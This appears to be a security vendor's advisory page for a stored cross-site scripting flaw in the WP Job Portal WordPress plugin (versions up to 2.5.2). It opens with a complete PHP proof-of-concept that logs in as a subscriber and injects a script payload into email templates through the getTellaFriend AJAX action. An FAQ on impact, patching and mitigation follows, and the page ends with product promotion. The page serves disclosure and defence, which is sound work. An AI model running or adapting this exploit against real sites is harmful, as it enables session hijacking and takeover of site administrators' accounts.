// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-48880 - WP Job Portal – AI-Powered Recruitment System for Company or Job Board website <= 2.5.2 - Authenticated (Subscriber+) Stored Cross-Site Scripting

// Proof of Concept: Demonstrates authenticated stored XSS via the getTellaFriend AJAX action
// This script requires a valid WordPress user session with subscriber-level or higher privileges

// Configuration - Replace these values before running
$target_url = 'http://example.com'; // WordPress site URL
$username = 'subscriber_user'; // Valid subscriber-level username
$password = 'subscriber_password'; // Corresponding password

// Payload for XSS - injects a script tag that will execute in admin context
$xss_payload = '<script>alert("Atomic Edge XSS CVE-2026-48880");</script>';

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$login_response = curl_exec($ch);
curl_close($ch);

// Step 2: Retrieve the WordPress nonce for the AJAX request
$nonce_url = $target_url . '/wp-admin/admin-ajax.php?action=getTellaFriend';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $nonce_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$nonce_response = curl_exec($ch);
curl_close($ch);

// Extract nonce from response (WordPress typically includes it in the HTML if present)
// Note: The vulnerability may not require a nonce for the getTellaFriend action

// Step 3: Exploit - send the XSS payload via AJAX
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_data = array(
    'action' => 'getTellaFriend',
    'body' => $xss_payload, // Stored in email template body
    'subject' => $xss_payload, // Stored in email template subject
    'templatefor' => 'jobseeker-package-expire',
    'title' => 'Test Template'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$exploit_response = curl_exec($ch);
curl_close($ch);

echo "Exploit response: " . $exploit_response . "n";
echo "Payload sent to: " . $ajax_url . "n";
echo "Check the WP Job Portal email templates section in the admin panel to verify the XSS payload was stored.n";

?>

Frequently Asked Questions

What is CVE-2026-48880?
Overview of the vulnerability
CVE-2026-48880 is a Stored Cross-Site Scripting (XSS) vulnerability found in the WP Job Portal plugin for WordPress, affecting versions up to and including 2.5.2. It allows authenticated users with subscriber-level access or higher to inject arbitrary JavaScript into email templates, which can execute when viewed by other users.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists in the ‘getTellaFriend’ AJAX action, where user-supplied input is not properly sanitized or escaped. An authenticated attacker can send a POST request with malicious payloads that get stored in the database, leading to execution of injected scripts when the email template is accessed.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the WP Job Portal plugin version 2.5.2 or earlier is affected. Specifically, authenticated users with subscriber-level access or above can exploit this vulnerability to inject malicious scripts.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the WP Job Portal plugin installed. If it is version 2.5.2 or earlier, your site is at risk. Additionally, review user roles to identify if any users have subscriber-level access or higher.
How can I fix the vulnerability?
Recommended actions
To fix the vulnerability, update the WP Job Portal plugin to version 2.5.3 or later, where the vulnerable AJAX actions have been removed. Regularly check for updates to ensure your plugins are secure.
What does the CVSS score of 6.4 indicate?
Understanding risk levels
A CVSS score of 6.4 indicates a medium severity vulnerability. This suggests that while the vulnerability is not critical, it poses a significant risk, especially in multi-user environments where low-privileged accounts can exploit it.
What practical risks does this vulnerability pose?
Potential impacts of exploitation
Successful exploitation can lead to session hijacking, credential theft, and unauthorized actions within the WordPress admin area. Malicious scripts can redirect users to harmful sites or compromise user data.
What is a proof of concept (PoC) in this context?
Demonstrating the vulnerability
A proof of concept (PoC) is a demonstration that shows how the vulnerability can be exploited. In this case, the PoC illustrates how an authenticated user can inject a script via the ‘getTellaFriend’ AJAX action, highlighting the ease of exploitation.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the WP Job Portal plugin until a patch can be applied. Additionally, review user permissions and limit access for subscribers to minimize the risk.
Are there any additional security measures I should take?
Enhancing overall security
Implement security best practices such as regular updates, using a web application firewall, and monitoring user activity. Educate users about security and restrict access based on roles to further protect your site.
How does this vulnerability relate to general web security?
Context of XSS vulnerabilities
Stored XSS vulnerabilities are common in web applications and can have severe consequences. They highlight the importance of input validation and output escaping in web development to protect against script injection.
Where can I find more information about this vulnerability?
Resources for further reading
For more information, refer to the official CVE database, security advisories from WordPress, and documentation from the plugin developers. Security forums and blogs may also provide insights and updates on this issue.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations